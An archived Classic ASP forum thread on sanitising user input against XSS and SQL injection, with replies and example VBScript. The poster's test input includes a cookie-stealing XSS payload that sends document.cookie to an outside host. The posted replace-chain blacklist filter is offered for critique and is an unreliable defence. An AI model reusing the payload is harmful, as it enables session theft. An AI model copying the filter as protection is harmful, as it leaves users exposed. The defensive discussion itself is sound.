Wrox Programmer Forums
Classic ASP Professional For advanced coder questions in ASP 3. NOT for ASP.NET 1.0, 1.1, or 2.0.
Welcome to the p2p.wrox.com Forums.

You are currently viewing the Classic ASP Professional section of the Wrox Programmer to Programmer discussions. This is a community of software programmers and website developers including Wrox book authors and readers. New member registration was closed in 2019. New posts were shut off and the site was archived into this static format as of October 1, 2020. If you require technical support for a Wrox book please contact http://hub.wiley.com
 
March 6th, 2008, 02:28 PM
Friend of Wrox
 
Join Date: Sep 2003
Posts: 171
Thanks: 0
Thanked 1 Time in 1 Post
Code Injection

Does anyone have any foolproof way of filtering all non-alphanumeric values from user input but allow predefined HTML tags such as:

<b></b>
<i></i>
<u></u>
<table></table>
<tr></tr>
<td></td>
<ol></ol>
<ul></ul>
<li></li>

as well as maintaining non-threatening links? Any help on this is greatly appreciated. Thanks in advance.

Dave

 
March 6th, 2008, 04:07 PM
Wrox Author
 
Join Date: Oct 2005
Posts: 4,104
Thanks: 1
Thanked 64 Times in 64 Posts

With regard to the predefined tags, IMHO, it is better practice to use a type of forum code. For example, if I want to make some text bold on this forum I use [ b ] [ /b ] with no spaces. The forum then translates that into <b></b>.

If you take this approach with the predefined tags, your job of handling malicious code becomes easier because you can simply HTMLEncode the rest of the input, which will render most XSS attacks useless. However, if you are looking for an approach to detect a <script></script> block, for example, you should use Regular Expressions. (You could of course use InStr() but that isn't nearly as efficient as RegEx.)

The easiest way to avoid SQL Injection attacks is to use parameterized queries as opposed to inline dynamic sql.

hth.

==========================================================
Read this if you want to know how to get a correct reply for your question:
http://www.catb.org/~esr/faqs/smart-questions.html
==========================================================
.: Wrox Technical Editor / Author :.
Wrox Books 24 x 7
==========================================================
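The parameterized query the reply recommends, as an added example rather than code from the thread: ADODB.Command binds the untrusted value separately from the SQL text, so nothing the user types can change the statement. The connection string and the table and column names are placeholders.

```vbscript
<%
' Added example (not from the thread): a parameterized query in Classic ASP.
' Placeholders: DB_SERVER_PLACEHOLDER, DB_NAME_PLACEHOLDER, the Users table.
Option Explicit
Dim conn, cmd, rs, userName

userName = Request.Form("username")   ' untrusted input, passed through unchanged

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "Provider=SQLOLEDB;Data Source=DB_SERVER_PLACEHOLDER;" & _
          "Initial Catalog=DB_NAME_PLACEHOLDER;Integrated Security=SSPI;"

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1   ' adCmdText

' The ? marker is bound below. The value is never quoted or concatenated
' into the SQL text, which is exactly what an inline dynamic query does
' and what lets injected quotes rewrite the statement.
cmd.CommandText = "SELECT UserID, DisplayName FROM Users WHERE UserName = ?"
' adVarWChar = 202, adParamInput = 1, size = column length
cmd.Parameters.Append cmd.CreateParameter("@UserName", 202, 1, 50, userName)

Set rs = cmd.Execute
If Not rs.EOF Then
    ' Output is HTML-encoded too: the stored value may itself contain markup
    Response.Write "Found: " & Server.HTMLEncode(rs("DisplayName")) & "<br>"
Else
    Response.Write "No such user.<br>"
End If

rs.Close : conn.Close
Set rs = Nothing : Set cmd = Nothing : Set conn = Nothing
%>
```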
 
March 6th, 2008, 07:04 PM
Friend of Wrox
 
Join Date: Sep 2003
Posts: 171
Thanks: 0
Thanked 1 Time in 1 Post

I thought about using regular expressions, but I don't quite have the experience with them to get something really bullet proof in a short amount of time.

I thought of a solution that I think might work well using pseudo tags (i.e. forum tags) and thought I'd post the code to get some other opinions. It requires defining some acceptable pseudo tags and assigning them a unique alphanumeric value, in my case 32 digits in length.

There are 4 replace filters that I run the string through and they are as follows:
1) Replace all encoded values into their standard values (e.g. '%26' to '&').
2) Transpose pseudo tags into 32 digit unique value. (e.g. '[ul]' to 'koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1')
3) Replace all non-acceptable characters with the equivalent HTML code OR possibly remove them altogether (e.g. '<' to '#60;').
4) Transpose all unique 32 digit values to previous pseudo tags (e.g. 'koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1' to '[ul]').
5) Translate pseudo tags at run time (e.g. '[ul]' to '[list]').

I think that if this is run against some rogue injection, the result will be enough to eliminate the threat even though the output is less than desirable. It should however work well for standard text, including minor HTML tags.

If anyone has any thoughts on this I would love to hear them. The solution is as follows:

NOTE: I had to add in a couple of spaces for pseudos to avoid being interpreted by this forum (e.g. [ url ]).

<%
'-- Malicious URL --
MyString = "[ url ] h ttp://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e[ -url ]Test Link[ /url ]"

'-- OR, the same URL once decoded (kept as a comment so the page still parses) --

'-- Malicious URL --
' h ttp://host/a.php?variable="><script>document.location='h ttp://w ww.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>


' == replace hex values with standard values ==
    MyString = REPLACE(MyString, "%20", " ")
    MyString = REPLACE(MyString, "%21", "!")
    MyString = REPLACE(MyString, "%22", """")
    MyString = REPLACE(MyString, "%23", "#")
    MyString = REPLACE(MyString, "%24", "$")
    MyString = REPLACE(MyString, "%25", "%")
    MyString = REPLACE(MyString, "%26", "&")
    MyString = REPLACE(MyString, "%27", "'")   ' a single apostrophe, so step 3 catches it
    MyString = REPLACE(MyString, "%28", "(")
    MyString = REPLACE(MyString, "%29", ")")
    MyString = REPLACE(MyString, "%2a", "*")
    MyString = REPLACE(MyString, "%2b", "+")
    MyString = REPLACE(MyString, "%2c", ",")
    MyString = REPLACE(MyString, "%2d", "-")
    MyString = REPLACE(MyString, "%2e", ".")
    MyString = REPLACE(MyString, "%2f", "/")
    MyString = REPLACE(MyString, "%2A", "*")
    MyString = REPLACE(MyString, "%2B", "+")
    MyString = REPLACE(MyString, "%2C", ",")
    MyString = REPLACE(MyString, "%2D", "-")
    MyString = REPLACE(MyString, "%2E", ".")
    MyString = REPLACE(MyString, "%2F", "/")
    MyString = REPLACE(MyString, "%30", "0")
    MyString = REPLACE(MyString, "%31", "1")
    MyString = REPLACE(MyString, "%32", "2")
    MyString = REPLACE(MyString, "%33", "3")
    MyString = REPLACE(MyString, "%34", "4")
    MyString = REPLACE(MyString, "%35", "5")
    MyString = REPLACE(MyString, "%36", "6")
    MyString = REPLACE(MyString, "%37", "7")
    MyString = REPLACE(MyString, "%38", "8")
    MyString = REPLACE(MyString, "%39", "9")
    MyString = REPLACE(MyString, "%3a", ":")
    MyString = REPLACE(MyString, "%3b", ";")
    MyString = REPLACE(MyString, "%3c", "<")
    MyString = REPLACE(MyString, "%3d", "=")
    MyString = REPLACE(MyString, "%3e", ">")
    MyString = REPLACE(MyString, "%3f", "?")
    MyString = REPLACE(MyString, "%3A", ":")
    MyString = REPLACE(MyString, "%3B", ";")
    MyString = REPLACE(MyString, "%3C", "<")
    MyString = REPLACE(MyString, "%3D", "=")
    MyString = REPLACE(MyString, "%3E", ">")
    MyString = REPLACE(MyString, "%3F", "?")
    MyString = REPLACE(MyString, "%40", "@")
    MyString = REPLACE(MyString, "%41", "A")
    MyString = REPLACE(MyString, "%42", "B")
    MyString = REPLACE(MyString, "%43", "C")
    MyString = REPLACE(MyString, "%44", "D")
    MyString = REPLACE(MyString, "%45", "E")
    MyString = REPLACE(MyString, "%46", "F")
    MyString = REPLACE(MyString, "%47", "G")
    MyString = REPLACE(MyString, "%48", "H")
    MyString = REPLACE(MyString, "%49", "I")
    MyString = REPLACE(MyString, "%4a", "J")
    MyString = REPLACE(MyString, "%4b", "K")
    MyString = REPLACE(MyString, "%4c", "L")
    MyString = REPLACE(MyString, "%4d", "M")
    MyString = REPLACE(MyString, "%4e", "N")
    MyString = REPLACE(MyString, "%4f", "O")
    MyString = REPLACE(MyString, "%4A", "J")
    MyString = REPLACE(MyString, "%4B", "K")
    MyString = REPLACE(MyString, "%4C", "L")
    MyString = REPLACE(MyString, "%4D", "M")
    MyString = REPLACE(MyString, "%4E", "N")
    MyString = REPLACE(MyString, "%4F", "O")
    MyString = REPLACE(MyString, "%50", "P")
    MyString = REPLACE(MyString, "%51", "Q")
    MyString = REPLACE(MyString, "%52", "R")
    MyString = REPLACE(MyString, "%53", "S")
    MyString = REPLACE(MyString, "%54", "T")
    MyString = REPLACE(MyString, "%55", "U")
    MyString = REPLACE(MyString, "%56", "V")
    MyString = REPLACE(MyString, "%57", "W")
    MyString = REPLACE(MyString, "%58", "X")
    MyString = REPLACE(MyString, "%59", "Y")
    MyString = REPLACE(MyString, "%5a", "Z")
    MyString = REPLACE(MyString, "%5b", "[")
    MyString = REPLACE(MyString, "%5c", "\")
    MyString = REPLACE(MyString, "%5d", "]")
    MyString = REPLACE(MyString, "%5e", "^")
    MyString = REPLACE(MyString, "%5f", "_")
    MyString = REPLACE(MyString, "%5A", "Z")
    MyString = REPLACE(MyString, "%5B", "[")
    MyString = REPLACE(MyString, "%5C", "\")
    MyString = REPLACE(MyString, "%5D", "]")
    MyString = REPLACE(MyString, "%5E", "^")
    MyString = REPLACE(MyString, "%5F", "_")
    MyString = REPLACE(MyString, "%60", "`")
    MyString = REPLACE(MyString, "%61", "a")
    MyString = REPLACE(MyString, "%62", "b")
    MyString = REPLACE(MyString, "%63", "c")
    MyString = REPLACE(MyString, "%64", "d")
    MyString = REPLACE(MyString, "%65", "e")
    MyString = REPLACE(MyString, "%66", "f")
    MyString = REPLACE(MyString, "%67", "g")
    MyString = REPLACE(MyString, "%68", "h")
    MyString = REPLACE(MyString, "%69", "i")
    MyString = REPLACE(MyString, "%6a", "j")
    MyString = REPLACE(MyString, "%6b", "k")
    MyString = REPLACE(MyString, "%6c", "l")
    MyString = REPLACE(MyString, "%6d", "m")
    MyString = REPLACE(MyString, "%6e", "n")
    MyString = REPLACE(MyString, "%6f", "o")
    MyString = REPLACE(MyString, "%6A", "j")
    MyString = REPLACE(MyString, "%6B", "k")
    MyString = REPLACE(MyString, "%6C", "l")
    MyString = REPLACE(MyString, "%6D", "m")
    MyString = REPLACE(MyString, "%6E", "n")
    MyString = REPLACE(MyString, "%6F", "o")
    MyString = REPLACE(MyString, "%70", "p")
    MyString = REPLACE(MyString, "%71", "q")
    MyString = REPLACE(MyString, "%72", "r")
    MyString = REPLACE(MyString, "%73", "s")
    MyString = REPLACE(MyString, "%74", "t")
    MyString = REPLACE(MyString, "%75", "u")
    MyString = REPLACE(MyString, "%76", "v")
    MyString = REPLACE(MyString, "%77", "w")
    MyString = REPLACE(MyString, "%78", "x")
    MyString = REPLACE(MyString, "%79", "y")
    MyString = REPLACE(MyString, "%7a", "z")
    MyString = REPLACE(MyString, "%7b", "{")
    MyString = REPLACE(MyString, "%7c", "|")
    MyString = REPLACE(MyString, "%7d", "}")
    MyString = REPLACE(MyString, "%7e", "~")
    MyString = REPLACE(MyString, "%7A", "z")
    MyString = REPLACE(MyString, "%7B", "{")
    MyString = REPLACE(MyString, "%7C", "|")
    MyString = REPLACE(MyString, "%7D", "}")
    MyString = REPLACE(MyString, "%7E", "~")   ' upper-case form of %7e
    response.write "1: " & MyString & "<br><br>"


' == transpose pseudo tags into 32 digit unique values ==
    MyString = REPLACE(MyString, "[ url]", "ix8yyagzczursx3ujnyfqj6hkaeftcye1")
    MyString = REPLACE(MyString, "[ -url]", "ix8yyagzczursx3ujnyfqj6hkaeftcye2")
    MyString = REPLACE(MyString, "[ /url]", "ix8yyagzczursx3ujnyfqj6hkaeftcye3")
    MyString = REPLACE(MyString, "[ol]", "w6ck3hngas7asxqgzdcvp8gklp5gvytr1")
    MyString = REPLACE(MyString, "[/ol]", "w6ck3hngas7asxqgzdcvp8gklp5gvytr2")
    MyString = REPLACE(MyString, "[ul]", "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1")
    MyString = REPLACE(MyString, "[/ul]", "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx2")
    MyString = REPLACE(MyString, "[li]", "pnqxkkk3zlvupblgayqyksv7nfs5zrcd1")
    MyString = REPLACE(MyString, "[/li]", "pnqxkkk3zlvupblgayqyksv7nfs5zrcd2")
    MyString = REPLACE(MyString, "[ URL]", "ix8yyagzczursx3ujnyfqj6hkaeftcye1")
    MyString = REPLACE(MyString, "[ -URL]", "ix8yyagzczursx3ujnyfqj6hkaeftcye2")
    MyString = REPLACE(MyString, "[ /URL]", "ix8yyagzczursx3ujnyfqj6hkaeftcye3")
    MyString = REPLACE(MyString, "[OL]", "w6ck3hngas7asxqgzdcvp8gklp5gvytr1")
    MyString = REPLACE(MyString, "[/OL]", "w6ck3hngas7asxqgzdcvp8gklp5gvytr2")
    MyString = REPLACE(MyString, "[UL]", "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1")
    MyString = REPLACE(MyString, "[/UL]", "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx2")
    MyString = REPLACE(MyString, "[LI]", "pnqxkkk3zlvupblgayqyksv7nfs5zrcd1")
    MyString = REPLACE(MyString, "[/LI]", "pnqxkkk3zlvupblgayqyksv7nfs5zrcd2")


' == replace non-acceptable characters with html values ==
' MyString = REPLACE(MyString, ";", "#59;")
    MyString = REPLACE(MyString, "!", "#33;")
    MyString = REPLACE(MyString, """", "#34;")
' MyString = REPLACE(MyString, "#", "#35;")
    MyString = REPLACE(MyString, "$", "#36;")
    MyString = REPLACE(MyString, "%", "#37;")
' MyString = REPLACE(MyString, "&", "#38;")
    MyString = REPLACE(MyString, "'", "#39;")
    MyString = REPLACE(MyString, "(", "#40;")
    MyString = REPLACE(MyString, ")", "#41;")
    MyString = REPLACE(MyString, "*", "#42;")
    MyString = REPLACE(MyString, "+", "#43;")
    MyString = REPLACE(MyString, ",", "#44;")
    MyString = REPLACE(MyString, "-", "#45;")
    MyString = REPLACE(MyString, ".", "#46;")
    MyString = REPLACE(MyString, "/", "#47;")
    MyString = REPLACE(MyString, ":", "#58;")
    MyString = REPLACE(MyString, "<", "")
    MyString = REPLACE(MyString, "=", "#61;")
    MyString = REPLACE(MyString, ">", "")
    MyString = REPLACE(MyString, "?", "#63;")
    MyString = REPLACE(MyString, "@", "#64;")
    MyString = REPLACE(MyString, "[", "")
    MyString = REPLACE(MyString, "\", "#92;")
    MyString = REPLACE(MyString, "]", "")
    MyString = REPLACE(MyString, "^", "#94;")
    MyString = REPLACE(MyString, "_", "#95;")
    MyString = REPLACE(MyString, "`", "#96;")
    MyString = REPLACE(MyString, "{", "#123;")
    MyString = REPLACE(MyString, "|", "#124;")
    MyString = REPLACE(MyString, "}", "#125;")
    MyString = REPLACE(MyString, "~", "#126;")


' == transpose 32 digit unique values into pseudo tags ==
    MyString = REPLACE(MyString, "ix8yyagzczursx3ujnyfqj6hkaeftcye1", "[ url]")
    MyString = REPLACE(MyString, "ix8yyagzczursx3ujnyfqj6hkaeftcye2", "[ -url]")
    MyString = REPLACE(MyString, "ix8yyagzczursx3ujnyfqj6hkaeftcye3", "[ /url]")
    MyString = REPLACE(MyString, "w6ck3hngas7asxqgzdcvp8gklp5gvytr1", "[ol]")
    MyString = REPLACE(MyString, "w6ck3hngas7asxqgzdcvp8gklp5gvytr2", "[/ol]")
    MyString = REPLACE(MyString, "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1", "[ul]")
    MyString = REPLACE(MyString, "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx2", "[/ul]")
    MyString = REPLACE(MyString, "pnqxkkk3zlvupblgayqyksv7nfs5zrcd1", "[li]")
    MyString = REPLACE(MyString, "pnqxkkk3zlvupblgayqyksv7nfs5zrcd2", "[/li]")

    response.write "4: " & MyString & "<br><br>"
%>
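The encode-first approach from the reply above, applied to the same pseudo-tag pipeline as the posted code: an added example, not code from the thread. It assumes ASP's intrinsic Server, Request and Response objects and uses [url=...]text[/url] as the link syntax; Request.Form has already %xx-decoded the value once, so no hand-written hex table is needed and the input is never decoded a second time.

```vbscript
<%
' Added example, not code from the thread: HTML-encode everything first, then
' translate only the allowlisted bracket tags back into real HTML.
Option Explicit

' True only for plain http/https URLs built from a fixed character allowlist,
' so nothing in the href can close the attribute or switch the scheme.
Function IsSafeUrl(href)
    Dim re
    Set re = New RegExp
    re.IgnoreCase = True
    re.Pattern = "^https?://[A-Za-z0-9.\-]+(:[0-9]+)?(/[A-Za-z0-9._~%!$&()*+,;=:@/?#\-]*)?$"
    IsSafeUrl = re.Test(href)
End Function

Function SafeBBCode(rawInput)
    Dim s, re, m, href
    ' 1. Encode everything. After this line no <, >, & or " typed by the
    '    user survives, however it was spelled on the way in.
    s = Server.HTMLEncode(rawInput)

    ' 2. Turn the allowlisted bracket tags into real HTML. These fixed
    '    replacements are now the only source of angle brackets in the output.
    Set re = New RegExp
    re.Global = True
    re.IgnoreCase = True
    re.Pattern = "\[(/?)(b|i|u|ol|ul|li)\]"
    s = re.Replace(s, "<$1$2>")

    ' 3. Links: emit an anchor only when the href passes IsSafeUrl (an
    '    encoded &amp; inside it is still valid in an attribute); otherwise
    '    the tag is left as harmless encoded text.
    re.Pattern = "\[url=([^\]]+)\](.*?)\[/url\]"
    For Each m In re.Execute(s)
        href = m.SubMatches(0)
        If IsSafeUrl(href) Then
            s = Replace(s, m.Value, "<a href=""" & href & """ rel=""nofollow"">" & _
                                    m.SubMatches(1) & "</a>")
        End If
    Next
    SafeBBCode = s
End Function

Response.Write SafeBBCode(Request.Form("body"))
%>
```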
